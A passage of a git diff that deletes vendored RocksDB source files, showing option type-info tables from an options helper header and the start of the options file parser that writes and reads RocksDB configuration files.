-      OptionType::kWALRecoveryMode, OptionVerificationType::kNormal, false, 0}},
-    {"enable_write_thread_adaptive_yield",
-     {offsetof(struct DBOptions, enable_write_thread_adaptive_yield),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"write_thread_slow_yield_usec",
-     {offsetof(struct DBOptions, write_thread_slow_yield_usec),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}},
-    {"write_thread_max_yield_usec",
-     {offsetof(struct DBOptions, write_thread_max_yield_usec),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}},
-    {"access_hint_on_compaction_start",
-     {offsetof(struct DBOptions, access_hint_on_compaction_start),
-      OptionType::kAccessHint, OptionVerificationType::kNormal, false, 0}},
-    {"info_log_level",
-     {offsetof(struct DBOptions, info_log_level), OptionType::kInfoLogLevel,
-      OptionVerificationType::kNormal, false, 0}},
-    {"dump_malloc_stats",
-     {offsetof(struct DBOptions, dump_malloc_stats), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"avoid_flush_during_recovery",
-     {offsetof(struct DBOptions, avoid_flush_during_recovery),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"avoid_flush_during_shutdown",
-     {offsetof(struct DBOptions, avoid_flush_during_shutdown),
-      OptionType::kBoolean, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, avoid_flush_during_shutdown)}},
-    {"allow_ingest_behind",
-     {offsetof(struct DBOptions, allow_ingest_behind), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false,
-      offsetof(struct ImmutableDBOptions, allow_ingest_behind)}},
-    {"concurrent_prepare",
-     {offsetof(struct DBOptions, concurrent_prepare), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false,
-      offsetof(struct ImmutableDBOptions, concurrent_prepare)}},
-    {"manual_wal_flush",
-     {offsetof(struct DBOptions, manual_wal_flush), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false,
-      offsetof(struct ImmutableDBOptions, manual_wal_flush)}}};
-
-// offset_of is used to get the offset of a class data member
-// ex: offset_of(&ColumnFamilyOptions::num_levels)
-// This call will return the offset of num_levels in ColumnFamilyOptions class
-//
-// This is the same as offsetof() but allow us to work with non standard-layout
-// classes and structures
-// refs:
-// http://en.cppreference.com/w/cpp/concept/StandardLayoutType
-// https://gist.github.com/graphitemaster/494f21190bb2c63c5516
-template <typename T1, typename T2>
-inline int offset_of(T1 T2::*member) {
-  static T2 obj;
-  return int(size_t(&(obj.*member)) - size_t(&obj));
-}
-
-static std::unordered_map<std::string, OptionTypeInfo> cf_options_type_info = {
-    /* not yet supported
-    CompactionOptionsFIFO compaction_options_fifo;
-    CompactionOptionsUniversal compaction_options_universal;
-    CompressionOptions compression_opts;
-    TablePropertiesCollectorFactories table_properties_collector_factories;
-    typedef std::vector<std::shared_ptr<TablePropertiesCollectorFactory>>
-        TablePropertiesCollectorFactories;
-    UpdateStatus (*inplace_callback)(char* existing_value,
-                                     uint34_t* existing_value_size,
-                                     Slice delta_value,
-                                     std::string* merged_value);
-     */
-    {"report_bg_io_stats",
-     {offset_of(&ColumnFamilyOptions::report_bg_io_stats), OptionType::kBoolean,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, report_bg_io_stats)}},
-    {"compaction_measure_io_stats",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, 0}},
-    {"disable_auto_compactions",
-     {offset_of(&ColumnFamilyOptions::disable_auto_compactions),
-      OptionType::kBoolean, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, disable_auto_compactions)}},
-    {"filter_deletes",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, true, 0}},
-    {"inplace_update_support",
-     {offset_of(&ColumnFamilyOptions::inplace_update_support),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"level_compaction_dynamic_level_bytes",
-     {offset_of(&ColumnFamilyOptions::level_compaction_dynamic_level_bytes),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"optimize_filters_for_hits",
-     {offset_of(&ColumnFamilyOptions::optimize_filters_for_hits),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"paranoid_file_checks",
-     {offset_of(&ColumnFamilyOptions::paranoid_file_checks),
-      OptionType::kBoolean, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, paranoid_file_checks)}},
-    {"force_consistency_checks",
-     {offset_of(&ColumnFamilyOptions::force_consistency_checks),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"purge_redundant_kvs_while_flush",
-     {offset_of(&ColumnFamilyOptions::purge_redundant_kvs_while_flush),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"verify_checksums_in_compaction",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, true, 0}},
-    {"soft_pending_compaction_bytes_limit",
-     {offset_of(&ColumnFamilyOptions::soft_pending_compaction_bytes_limit),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, soft_pending_compaction_bytes_limit)}},
-    {"hard_pending_compaction_bytes_limit",
-     {offset_of(&ColumnFamilyOptions::hard_pending_compaction_bytes_limit),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, hard_pending_compaction_bytes_limit)}},
-    {"hard_rate_limit",
-     {0, OptionType::kDouble, OptionVerificationType::kDeprecated, true, 0}},
-    {"soft_rate_limit",
-     {0, OptionType::kDouble, OptionVerificationType::kDeprecated, true, 0}},
-    {"max_compaction_bytes",
-     {offset_of(&ColumnFamilyOptions::max_compaction_bytes),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_compaction_bytes)}},
-    {"expanded_compaction_factor",
-     {0, OptionType::kInt, OptionVerificationType::kDeprecated, true, 0}},
-    {"level0_file_num_compaction_trigger",
-     {offset_of(&ColumnFamilyOptions::level0_file_num_compaction_trigger),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, level0_file_num_compaction_trigger)}},
-    {"level0_slowdown_writes_trigger",
-     {offset_of(&ColumnFamilyOptions::level0_slowdown_writes_trigger),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, level0_slowdown_writes_trigger)}},
-    {"level0_stop_writes_trigger",
-     {offset_of(&ColumnFamilyOptions::level0_stop_writes_trigger),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, level0_stop_writes_trigger)}},
-    {"max_grandparent_overlap_factor",
-     {0, OptionType::kInt, OptionVerificationType::kDeprecated, true, 0}},
-    {"max_mem_compaction_level",
-     {0, OptionType::kInt, OptionVerificationType::kDeprecated, false, 0}},
-    {"max_write_buffer_number",
-     {offset_of(&ColumnFamilyOptions::max_write_buffer_number),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_write_buffer_number)}},
-    {"max_write_buffer_number_to_maintain",
-     {offset_of(&ColumnFamilyOptions::max_write_buffer_number_to_maintain),
-      OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-    {"min_write_buffer_number_to_merge",
-     {offset_of(&ColumnFamilyOptions::min_write_buffer_number_to_merge),
-      OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-    {"num_levels",
-     {offset_of(&ColumnFamilyOptions::num_levels), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"source_compaction_factor",
-     {0, OptionType::kInt, OptionVerificationType::kDeprecated, true, 0}},
-    {"target_file_size_multiplier",
-     {offset_of(&ColumnFamilyOptions::target_file_size_multiplier),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, target_file_size_multiplier)}},
-    {"arena_block_size",
-     {offset_of(&ColumnFamilyOptions::arena_block_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, arena_block_size)}},
-    {"inplace_update_num_locks",
-     {offset_of(&ColumnFamilyOptions::inplace_update_num_locks),
-      OptionType::kSizeT, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, inplace_update_num_locks)}},
-    {"max_successive_merges",
-     {offset_of(&ColumnFamilyOptions::max_successive_merges),
-      OptionType::kSizeT, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_successive_merges)}},
-    {"memtable_huge_page_size",
-     {offset_of(&ColumnFamilyOptions::memtable_huge_page_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, memtable_huge_page_size)}},
-    {"memtable_prefix_bloom_huge_page_tlb_size",
-     {0, OptionType::kSizeT, OptionVerificationType::kDeprecated, true, 0}},
-    {"write_buffer_size",
-     {offset_of(&ColumnFamilyOptions::write_buffer_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, write_buffer_size)}},
-    {"bloom_locality",
-     {offset_of(&ColumnFamilyOptions::bloom_locality), OptionType::kUInt32T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"memtable_prefix_bloom_bits",
-     {0, OptionType::kUInt32T, OptionVerificationType::kDeprecated, true, 0}},
-    {"memtable_prefix_bloom_size_ratio",
-     {offset_of(&ColumnFamilyOptions::memtable_prefix_bloom_size_ratio),
-      OptionType::kDouble, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, memtable_prefix_bloom_size_ratio)}},
-    {"memtable_prefix_bloom_probes",
-     {0, OptionType::kUInt32T, OptionVerificationType::kDeprecated, true, 0}},
-    {"min_partial_merge_operands",
-     {0, OptionType::kUInt32T, OptionVerificationType::kDeprecated, true, 0}},
-    {"max_bytes_for_level_base",
-     {offset_of(&ColumnFamilyOptions::max_bytes_for_level_base),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_bytes_for_level_base)}},
-    {"max_bytes_for_level_multiplier",
-     {offset_of(&ColumnFamilyOptions::max_bytes_for_level_multiplier),
-      OptionType::kDouble, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_bytes_for_level_multiplier)}},
-    {"max_bytes_for_level_multiplier_additional",
-     {offset_of(
-          &ColumnFamilyOptions::max_bytes_for_level_multiplier_additional),
-      OptionType::kVectorInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions,
-               max_bytes_for_level_multiplier_additional)}},
-    {"max_sequential_skip_in_iterations",
-     {offset_of(&ColumnFamilyOptions::max_sequential_skip_in_iterations),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_sequential_skip_in_iterations)}},
-    {"target_file_size_base",
-     {offset_of(&ColumnFamilyOptions::target_file_size_base),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, target_file_size_base)}},
-    {"rate_limit_delay_max_milliseconds",
-     {0, OptionType::kUInt, OptionVerificationType::kDeprecated, false, 0}},
-    {"compression",
-     {offset_of(&ColumnFamilyOptions::compression),
-      OptionType::kCompressionType, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, compression)}},
-    {"compression_per_level",
-     {offset_of(&ColumnFamilyOptions::compression_per_level),
-      OptionType::kVectorCompressionType, OptionVerificationType::kNormal,
-      false, 0}},
-    {"bottommost_compression",
-     {offset_of(&ColumnFamilyOptions::bottommost_compression),
-      OptionType::kCompressionType, OptionVerificationType::kNormal, false, 0}},
-    {"comparator",
-     {offset_of(&ColumnFamilyOptions::comparator), OptionType::kComparator,
-      OptionVerificationType::kByName, false, 0}},
-    {"prefix_extractor",
-     {offset_of(&ColumnFamilyOptions::prefix_extractor),
-      OptionType::kSliceTransform, OptionVerificationType::kByNameAllowNull,
-      false, 0}},
-    {"memtable_insert_with_hint_prefix_extractor",
-     {offset_of(
-          &ColumnFamilyOptions::memtable_insert_with_hint_prefix_extractor),
-      OptionType::kSliceTransform, OptionVerificationType::kByNameAllowNull,
-      false, 0}},
-    {"memtable_factory",
-     {offset_of(&ColumnFamilyOptions::memtable_factory),
-      OptionType::kMemTableRepFactory, OptionVerificationType::kByName, false,
-      0}},
-    {"table_factory",
-     {offset_of(&ColumnFamilyOptions::table_factory), OptionType::kTableFactory,
-      OptionVerificationType::kByName, false, 0}},
-    {"compaction_filter",
-     {offset_of(&ColumnFamilyOptions::compaction_filter),
-      OptionType::kCompactionFilter, OptionVerificationType::kByName, false,
-      0}},
-    {"compaction_filter_factory",
-     {offset_of(&ColumnFamilyOptions::compaction_filter_factory),
-      OptionType::kCompactionFilterFactory, OptionVerificationType::kByName,
-      false, 0}},
-    {"merge_operator",
-     {offset_of(&ColumnFamilyOptions::merge_operator),
-      OptionType::kMergeOperator, OptionVerificationType::kByName, false, 0}},
-    {"compaction_style",
-     {offset_of(&ColumnFamilyOptions::compaction_style),
-      OptionType::kCompactionStyle, OptionVerificationType::kNormal, false, 0}},
-    {"compaction_pri",
-     {offset_of(&ColumnFamilyOptions::compaction_pri),
-      OptionType::kCompactionPri, OptionVerificationType::kNormal, false, 0}}};
-
-static std::unordered_map<std::string, CompressionType>
-    compression_type_string_map = {
-        {"kNoCompression", kNoCompression},
-        {"kSnappyCompression", kSnappyCompression},
-        {"kZlibCompression", kZlibCompression},
-        {"kBZip2Compression", kBZip2Compression},
-        {"kLZ4Compression", kLZ4Compression},
-        {"kLZ4HCCompression", kLZ4HCCompression},
-        {"kXpressCompression", kXpressCompression},
-        {"kZSTD", kZSTD},
-        {"kZSTDNotFinalCompression", kZSTDNotFinalCompression},
-        {"kDisableCompressionOption", kDisableCompressionOption}};
-
-static std::unordered_map<std::string, BlockBasedTableOptions::IndexType>
-    block_base_table_index_type_string_map = {
-        {"kBinarySearch", BlockBasedTableOptions::IndexType::kBinarySearch},
-        {"kHashSearch", BlockBasedTableOptions::IndexType::kHashSearch},
-        {"kTwoLevelIndexSearch",
-         BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch}};
-
-static std::unordered_map<std::string, EncodingType> encoding_type_string_map =
-    {{"kPlain", kPlain}, {"kPrefix", kPrefix}};
-
-static std::unordered_map<std::string, CompactionStyle>
-    compaction_style_string_map = {
-        {"kCompactionStyleLevel", kCompactionStyleLevel},
-        {"kCompactionStyleUniversal", kCompactionStyleUniversal},
-        {"kCompactionStyleFIFO", kCompactionStyleFIFO},
-        {"kCompactionStyleNone", kCompactionStyleNone}};
-
-static std::unordered_map<std::string, CompactionPri>
-    compaction_pri_string_map = {
-        {"kByCompensatedSize", kByCompensatedSize},
-        {"kOldestLargestSeqFirst", kOldestLargestSeqFirst},
-        {"kOldestSmallestSeqFirst", kOldestSmallestSeqFirst},
-        {"kMinOverlappingRatio", kMinOverlappingRatio}};
-
-static std::unordered_map<std::string,
-                          WALRecoveryMode> wal_recovery_mode_string_map = {
-    {"kTolerateCorruptedTailRecords",
-     WALRecoveryMode::kTolerateCorruptedTailRecords},
-    {"kAbsoluteConsistency", WALRecoveryMode::kAbsoluteConsistency},
-    {"kPointInTimeRecovery", WALRecoveryMode::kPointInTimeRecovery},
-    {"kSkipAnyCorruptedRecords", WALRecoveryMode::kSkipAnyCorruptedRecords}};
-
-static std::unordered_map<std::string, DBOptions::AccessHint>
-    access_hint_string_map = {{"NONE", DBOptions::AccessHint::NONE},
-                              {"NORMAL", DBOptions::AccessHint::NORMAL},
-                              {"SEQUENTIAL", DBOptions::AccessHint::SEQUENTIAL},
-                              {"WILLNEED", DBOptions::AccessHint::WILLNEED}};
-
-static std::unordered_map<std::string, InfoLogLevel> info_log_level_string_map =
-    {{"DEBUG_LEVEL", InfoLogLevel::DEBUG_LEVEL},
-     {"INFO_LEVEL", InfoLogLevel::INFO_LEVEL},
-     {"WARN_LEVEL", InfoLogLevel::WARN_LEVEL},
-     {"ERROR_LEVEL", InfoLogLevel::ERROR_LEVEL},
-     {"FATAL_LEVEL", InfoLogLevel::FATAL_LEVEL},
-     {"HEADER_LEVEL", InfoLogLevel::HEADER_LEVEL}};
-
-extern Status StringToMap(
-    const std::string& opts_str,
-    std::unordered_map<std::string, std::string>* opts_map);
-
-extern bool ParseOptionHelper(char* opt_address, const OptionType& opt_type,
-                              const std::string& value);
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options_parser.cc b/thirdparty/rocksdb/options/options_parser.cc
deleted file mode 100644
index 2cb60a0..0000000
--- a/thirdparty/rocksdb/options/options_parser.cc
+++ /dev/null
@@ -1,792 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "options/options_parser.h"
-
-#include <cmath>
-#include <map>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "options/options_helper.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "util/cast_util.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-#include "port/port.h"
-
-namespace rocksdb {
-
-static const std::string option_file_header =
-    "# This is a RocksDB option file.\n"
-    "#\n"
-    "# For detailed file format spec, please refer to the example file\n"
-    "# in examples/rocksdb_option_file_example.ini\n"
-    "#\n"
-    "\n";
-
-Status PersistRocksDBOptions(const DBOptions& db_opt,
-                             const std::vector<std::string>& cf_names,
-                             const std::vector<ColumnFamilyOptions>& cf_opts,
-                             const std::string& file_name, Env* env) {
-  TEST_SYNC_POINT("PersistRocksDBOptions:start");
-  if (cf_names.size() != cf_opts.size()) {
-    return Status::InvalidArgument(
-        "cf_names.size() and cf_opts.size() must be the same");
-  }
-  std::unique_ptr<WritableFile> writable;
-
-  Status s = env->NewWritableFile(file_name, &writable, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-  std::string options_file_content;
-
-  writable->Append(option_file_header + "[" +
-                   opt_section_titles[kOptionSectionVersion] +
-                   "]\n"
-                   "  rocksdb_version=" +
-                   ToString(ROCKSDB_MAJOR) + "." + ToString(ROCKSDB_MINOR) +
-                   "." + ToString(ROCKSDB_PATCH) + "\n");
-  writable->Append("  options_file_version=" +
-                   ToString(ROCKSDB_OPTION_FILE_MAJOR) + "." +
-                   ToString(ROCKSDB_OPTION_FILE_MINOR) + "\n");
-  writable->Append("\n[" + opt_section_titles[kOptionSectionDBOptions] +
-                   "]\n  ");
-
-  s = GetStringFromDBOptions(&options_file_content, db_opt, "\n  ");
-  if (!s.ok()) {
-    writable->Close();
-    return s;
-  }
-  writable->Append(options_file_content + "\n");
-
-  for (size_t i = 0; i < cf_opts.size(); ++i) {
-    // CFOptions section
-    writable->Append("\n[" + opt_section_titles[kOptionSectionCFOptions] +
-                     " \"" + EscapeOptionString(cf_names[i]) + "\"]\n  ");
-    s = GetStringFromColumnFamilyOptions(&options_file_content, cf_opts[i],
-                                         "\n  ");
-    if (!s.ok()) {
-      writable->Close();
-      return s;
-    }
-    writable->Append(options_file_content + "\n");
-    // TableOptions section
-    auto* tf = cf_opts[i].table_factory.get();
-    if (tf != nullptr) {
-      writable->Append("[" + opt_section_titles[kOptionSectionTableOptions] +
-                       tf->Name() + " \"" + EscapeOptionString(cf_names[i]) +
-                       "\"]\n  ");
-      options_file_content.clear();
-      s = tf->GetOptionString(&options_file_content, "\n  ");
-      if (!s.ok()) {
-        return s;
-      }
-      writable->Append(options_file_content + "\n");
-    }
-  }
-  writable->Flush();
-  writable->Fsync();
-  writable->Close();
-
-  return RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-      db_opt, cf_names, cf_opts, file_name, env);
-}
-
-RocksDBOptionsParser::RocksDBOptionsParser() { Reset(); }
-
-void RocksDBOptionsParser::Reset() {
-  db_opt_ = DBOptions();
-  db_opt_map_.clear();
-  cf_names_.clear();
-  cf_opts_.clear();
-  cf_opt_maps_.clear();
-  has_version_section_ = false;
-  has_db_options_ = false;
-  has_default_cf_options_ = false;
-  for (int i = 0; i < 3; ++i) {
-    db_version[i] = 0;
-    opt_file_version[i] = 0;
-  }
-}
-
-bool RocksDBOptionsParser::IsSection(const std::string& line) {
-  if (line.size() < 2) {
-    return false;
-  }
-  if (line[0] != '[' || line[line.size() - 1] != ']') {
-    return false;
-  }
-  return true;
-}
-
-Status RocksDBOptionsParser::ParseSection(OptionSection* section,
-                                          std::string* title,
-                                          std::string* argument,
-                                          const std::string& line,
-                                          const int line_num) {
-  *section = kOptionSectionUnknown;
-  // A section is of the form [<SectionName> "<SectionArg>"], where
-  // "<SectionArg>" is optional.
-  size_t arg_start_pos = line.find("\"");
-  size_t arg_end_pos = line.rfind("\"");
-  // The following if-then check tries to identify whether the input
-  // section has the optional section argument.
-  if (arg_start_pos != std::string::npos && arg_start_pos != arg_end_pos) {
-    *title = TrimAndRemoveComment(line.substr(1, arg_start_pos - 1), true);
-    *argument = UnescapeOptionString(
-        line.substr(arg_start_pos + 1, arg_end_pos - arg_start_pos - 1));
-  } else {
-    *title = TrimAndRemoveComment(line.substr(1, line.size() - 2), true);
-    *argument = "";
-  }
-  for (int i = 0; i < kOptionSectionUnknown; ++i) {
-    if (title->find(opt_section_titles[i]) == 0) {
-      if (i == kOptionSectionVersion || i == kOptionSectionDBOptions ||
-          i == kOptionSectionCFOptions) {
-        if (title->size() == opt_section_titles[i].size()) {
-          // if true, then it indicats equal
-          *section = static_cast<OptionSection>(i);
-          return CheckSection(*section, *argument, line_num);
-        }
-      } else if (i == kOptionSectionTableOptions) {
-        // This type of sections has a sufffix at the end of the
-        // section title
-        if (title->size() > opt_section_titles[i].size()) {
-          *section = static_cast<OptionSection>(i);
-          return CheckSection(*section, *argument, line_num);
-        }
-      }
-    }
-  }
-  return Status::InvalidArgument(std::string("Unknown section ") + line);
-}
-
-Status RocksDBOptionsParser::InvalidArgument(const int line_num,
-                                             const std::string& message) {
-  return Status::InvalidArgument(
-      "[RocksDBOptionsParser Error] ",
-      message + " (at line " + ToString(line_num) + ")");
-}
-
-Status RocksDBOptionsParser::ParseStatement(std::string* name,
-                                            std::string* value,
-                                            const std::string& line,
-                                            const int line_num) {
-  size_t eq_pos = line.find("=");
-  if (eq_pos == std::string::npos) {
-    return InvalidArgument(line_num, "A valid statement must have a '='.");
-  }
-
-  *name = TrimAndRemoveComment(line.substr(0, eq_pos), true);
-  *value =
-      TrimAndRemoveComment(line.substr(eq_pos + 1, line.size() - eq_pos - 1));
-  if (name->empty()) {
-    return InvalidArgument(line_num,
-                           "A valid statement must have a variable name.");
-  }
-  return Status::OK();
-}
-
-namespace {
-bool ReadOneLine(std::istringstream* iss, SequentialFile* seq_file,
-                 std::string* output, bool* has_data, Status* result) {
-  const int kBufferSize = 4096;
-  char buffer[kBufferSize + 1];
-  Slice input_slice;
-
-  std::string line;
-  bool has_complete_line = false;
-  while (!has_complete_line) {
-    if (std::getline(*iss, line)) {
-      has_complete_line = !iss->eof();
-    } else {
-      has_complete_line = false;
-    }
-    if (!has_complete_line) {
-      // if we're not sure whether we have a complete line,
-      // further read from the file.
-      if (*has_data) {
-        *result = seq_file->Read(kBufferSize, &input_slice, buffer);
-      }
-      if (input_slice.size() == 0) {
-        // meaning we have read all the data
-        *has_data = false;
-        break;
-      } else {
-        iss->str(line + input_slice.ToString());
-        // reset the internal state of iss so that we can keep reading it.
-        iss->clear();
-        *has_data = (input_slice.size() == kBufferSize);
-        continue;
-      }
-    }
-  }
-  *output = line;
-  return *has_data || has_complete_line;
-}
-}  // namespace
-
-Status RocksDBOptionsParser::Parse(const std::string& file_name, Env* env,
-                                   bool ignore_unknown_options) {
-  Reset();
-
-  std::unique_ptr<SequentialFile> seq_file;
-  Status s = env->NewSequentialFile(file_name, &seq_file, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-
-  OptionSection section = kOptionSectionUnknown;
-  std::string title;
-  std::string argument;
-  std::unordered_map<std::string, std::string> opt_map;
-  std::istringstream iss;
-  std::string line;
-  bool has_data = true;
-  // we only support single-lined statement.
-  for (int line_num = 1;
-       ReadOneLine(&iss, seq_file.get(), &line, &has_data, &s); ++line_num) {
-    if (!s.ok()) {
-      return s;
-    }
-    line = TrimAndRemoveComment(line);
-    if (line.empty()) {
-      continue;
-    }
-    if (IsSection(line)) {
-      s = EndSection(section, title, argument, opt_map, ignore_unknown_options);
-      opt_map.clear();
-      if (!s.ok()) {
-        return s;
-      }
-      s = ParseSection(&section, &title, &argument, line, line_num);
-      if (!s.ok()) {
-        return s;
-      }
-    } else {
-      std::string name;
-      std::string value;
-      s = ParseStatement(&name, &value, line, line_num);
-      if (!s.ok()) {
-        return s;
-      }
-      opt_map.insert({name, value});
-    }
-  }
-
-  s = EndSection(section, title, argument, opt_map, ignore_unknown_options);
-  opt_map.clear();
-  if (!s.ok()) {
-    return s;
-  }
-  return ValidityCheck();
-}
-
-Status RocksDBOptionsParser::CheckSection(const OptionSection section,
-                                          const std::string& section_arg,
-                                          const int line_num) {
-  if (section == kOptionSectionDBOptions) {
-    if (has_db_options_) {
-      return InvalidArgument(
-          line_num,
-          "More than one DBOption section found in the option config file");
-    }
-    has_db_options_ = true;
-  } else if (section == kOptionSectionCFOptions) {
-    bool is_default_cf = (section_arg == kDefaultColumnFamilyName);
-    if (cf_opts_.size() == 0 && !is_default_cf) {
-      return InvalidArgument(
-          line_num,
-          "Default column family must be the first CFOptions section "
-          "in the option config file");
-    } else if (cf_opts_.size() != 0 && is_default_cf) {
-      return InvalidArgument(
-          line_num,
-          "Default column family must be the first CFOptions section "
-          "in the optio/n config file");
-    } else if (GetCFOptions(section_arg) != nullptr) {
-      return InvalidArgument(
-          line_num,
-          "Two identical column families found in option config file");
-    }
-    has_default_cf_options_ |= is_default_cf;
-  } else if (section == kOptionSectionTableOptions) {
-    if (GetCFOptions(section_arg) == nullptr) {
-      return InvalidArgument(
-          line_num, std::string(
-                        "Does not find a matched column family name in "
-                        "TableOptions section.  Column Family Name:") +
-                        section_arg);
-    }
-  } else if (section == kOptionSectionVersion) {
-    if (has_version_section_) {
-      return InvalidArgument(
-          line_num,
-          "More than one Version section found in the option config file.");
-    }
-    has_version_section_ = true;
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::ParseVersionNumber(const std::string& ver_name,
-                                                const std::string& ver_string,
-                                                const int max_count,
-                                                int* version) {
-  int version_index = 0;
-  int current_number = 0;
-  int current_digit_count = 0;
-  bool has_dot = false;
-  for (int i = 0; i < max_count; ++i) {
-    version[i] = 0;
-  }
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-  for (size_t i = 0; i < ver_string.size(); ++i) {
-    if (ver_string[i] == '.') {
-      if (version_index >= max_count - 1) {
-        snprintf(buffer, sizeof(buffer) - 1,
-                 "A valid %s can only contains at most %d dots.",
-                 ver_name.c_str(), max_count - 1);
-        return Status::InvalidArgument(buffer);
-      }
-      if (current_digit_count == 0) {
-        snprintf(buffer, sizeof(buffer) - 1,
-                 "A valid %s must have at least one digit before each dot.",
-                 ver_name.c_str());
-        return Status::InvalidArgument(buffer);
-      }
-      version[version_index++] = current_number;
-      current_number = 0;
-      current_digit_count = 0;
-      has_dot = true;
-    } else if (isdigit(ver_string[i])) {
-      current_number = current_number * 10 + (ver_string[i] - '0');
-      current_digit_count++;
-    } else {
-      snprintf(buffer, sizeof(buffer) - 1,
-               "A valid %s can only contains dots and numbers.",
-               ver_name.c_str());
-      return Status::InvalidArgument(buffer);
-    }
-  }
-  version[version_index] = current_number;
-  if (has_dot && current_digit_count == 0) {
-    snprintf(buffer, sizeof(buffer) - 1,
-             "A valid %s must have at least one digit after each dot.",
-             ver_name.c_str());
-    return Status::InvalidArgument(buffer);
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::EndSection(
-    const OptionSection section, const std::string& section_title,
-    const std::string& section_arg,
-    const std::unordered_map<std::string, std::string>& opt_map,
-    bool ignore_unknown_options) {
-  Status s;
-  if (section == kOptionSectionDBOptions) {
-    s = GetDBOptionsFromMap(DBOptions(), opt_map, &db_opt_, true,
-                            ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-    db_opt_map_ = opt_map;
-  } else if (section == kOptionSectionCFOptions) {
-    // This condition should be ensured earlier in ParseSection
-    // so we make an assertion here.
-    assert(GetCFOptions(section_arg) == nullptr);
-    cf_names_.emplace_back(section_arg);
-    cf_opts_.emplace_back();
-    s = GetColumnFamilyOptionsFromMap(ColumnFamilyOptions(), opt_map,
-                                      &cf_opts_.back(), true,
-                                      ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-    // keep the parsed string.
-    cf_opt_maps_.emplace_back(opt_map);
-  } else if (section == kOptionSectionTableOptions) {
-    assert(GetCFOptions(section_arg) != nullptr);
-    auto* cf_opt = GetCFOptionsImpl(section_arg);
-    if (cf_opt == nullptr) {
-      return Status::InvalidArgument(
-          "The specified column family must be defined before the "
-          "TableOptions section:",
-          section_arg);
-    }
-    // Ignore error as table factory deserialization is optional
-    s = GetTableFactoryFromMap(
-        section_title.substr(
-            opt_section_titles[kOptionSectionTableOptions].size()),
-        opt_map, &(cf_opt->table_factory), ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-  } else if (section == kOptionSectionVersion) {
-    for (const auto pair : opt_map) {
-      if (pair.first == "rocksdb_version") {
-        s = ParseVersionNumber(pair.first, pair.second, 3, db_version);
-        if (!s.ok()) {
-          return s;
-        }
-      } else if (pair.first == "options_file_version") {
-        s = ParseVersionNumber(pair.first, pair.second, 2, opt_file_version);
